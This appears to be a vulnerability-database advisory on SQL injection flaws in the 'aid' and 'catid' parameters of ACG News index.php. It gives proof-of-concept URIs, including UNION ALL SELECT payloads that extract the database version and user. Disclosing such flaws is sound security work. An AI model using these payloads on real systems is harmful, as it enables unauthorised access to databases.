ACG News index.php Multiple SQL Injection Vulnerabilities

info
discussion
exploit
solution
references

ACG News index.php Multiple SQL Injection Vulnerabilities

Attackers can use a browser to exploit these issues.

The following proof-of-concept URIs are available:

http://www.example.com/index.php?menu=showarticle&aid=[SQL INJECTION]
http://www.example.com/index.php?menu=showarticle&aid=-3 UNION ALL SELECT 1,@@version,3,4,5,user(),7

http://www.example.com/index.php?menu=showcat&catid=[SQL INJECTION]
http://www.example.com/index.php?menu=showcat&catid=-3 UNION ALL SELECT 1,@@version